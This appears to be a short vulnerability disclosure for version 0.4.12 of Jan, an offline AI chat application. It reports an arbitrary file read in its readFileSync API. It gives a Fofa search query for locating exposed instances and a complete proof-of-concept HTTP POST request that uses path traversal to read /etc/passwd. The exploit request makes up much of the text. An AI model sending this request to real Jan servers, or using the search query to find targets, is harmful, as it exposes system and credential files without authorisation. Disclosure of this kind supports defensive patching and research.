Introduce
Jan is an open source alternative to ChatGPT that runs 100% offline on your computer. Multiple engine support (llama.cpp, TensorRT-LLM).
Vendor of the product(s)
Vulnerability Description
Jan's API interface readFileSync does not filter parameters, resulting in an arbitrary file read/download vulnerability.
Affected Version
- 0.4.12 Latest
Search Syntax
Fofa
- icon_hash="-165268926"
Principle and recurrence of vulnerabilities
The /v1/app/existsSync interface can determine whether a file exists:
The /v1/app/readFileSync interface can read or download arbitrary file:
Poc
POST /v1/app/readFileSync HTTP/1.1
Host: {{Host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://<IP>:<Port>
contentType: application/json
Content-Type: text/plain;charset=UTF-8
Content-Length: 48
Origin: http://<IP>:<Port>
Connection: close
["file:/../../../../../../etc/passwd","utf-8"]
牛皮